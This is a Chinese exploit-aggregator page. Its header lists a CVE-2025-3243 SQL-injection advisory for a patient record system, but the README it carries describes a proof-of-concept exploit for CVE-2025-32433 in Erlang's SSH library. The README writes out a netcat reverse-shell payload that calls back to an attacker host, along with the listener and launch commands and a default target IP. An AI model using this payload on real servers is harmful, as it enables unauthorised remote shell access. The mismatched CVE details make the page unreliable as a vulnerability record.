POC详情: 9e953763abdbe7fc368f093ac710e536acc566a1

来源
https://github.com/TeneBrae93/CVE-2025-3243
关联漏洞
标题: Code-Projects Patient Record Management System 注入漏洞 (CVE-2025-3243)
描述:Code-Projects Patient Record Management System是Code-Projects开源的一个病历管理系统。 Code-Projects Patient Record Management System 1.0版本存在注入漏洞,该漏洞源于对参数itr_no的错误操作会导致SQL注入。
描述
A proof-of-concept exploit for CVE-2025-32433, a critical vulnerability in Erlang's SSH library that allows pre-authenticated code execution via malformed SSH_MSG_CHANNEL_REQUEST packets.
介绍
# CVE-2025-32433 Erlang SSH Library Exploit

A proof-of-concept exploit for **CVE-2025-32433**, a critical vulnerability in Erlang's SSH library that allows pre-authenticated code execution via malformed `SSH_MSG_CHANNEL_REQUEST` packets.

---

## Features

- **Original exploit** by Matthew Keeley
- **Updated version** by Tyler Ramsbey:
  - Command‑line arguments for **LHOST**, **LPORT**, **RHOST**, and **RPORT**
  - Built‑in help and usage via `argparse`
  - Erlang‑style reverse shell payload using `os:cmd("nc LHOST LPORT -e /bin/sh").`
  - Clean function decomposition and status logging for each stage

---

## Prerequisites

- **Python 3**
- A working `nc` (Netcat) listener on your attack machine
- Network access to the target SSH service (default port `22`)

---

## Usage

1. **Start your listener** on the attack box:

   ```sh
   nc -lvnp 4444
   ```

2. **Run the exploit**:

   ```sh
   python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
   ```

3. **Wait for the shell** to connect back to your listener.


### Help Menu

```sh
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
  -h, --help            show this help message and exit
  -lh LHOST, --lhost LHOST
                        Local host/IP to receive the reverse shell
  -lp LPORT, --lport LPORT
                        Local port to receive the reverse shell
  -rh RHOST, --rhost RHOST
                        Target SSH server IP (default: 10.10.248.101)
  -rp RPORT, --rport RPORT
                        Target SSH server port (default: 22)
```

---

## Credits

- **Original script** by Matthew Keeley ([MattKeeley](https://github.com/MattKeeley))
- **This updated version** by Tyler Ramsbey

---

## Disclaimer

Use this code only on systems you own or have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.
文件快照

 [4.0K]  /data/pocs/9e953763abdbe7fc368f093ac710e536acc566a1
├── [4.1K]  CVE-2025-3243.py
└── [2.0K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。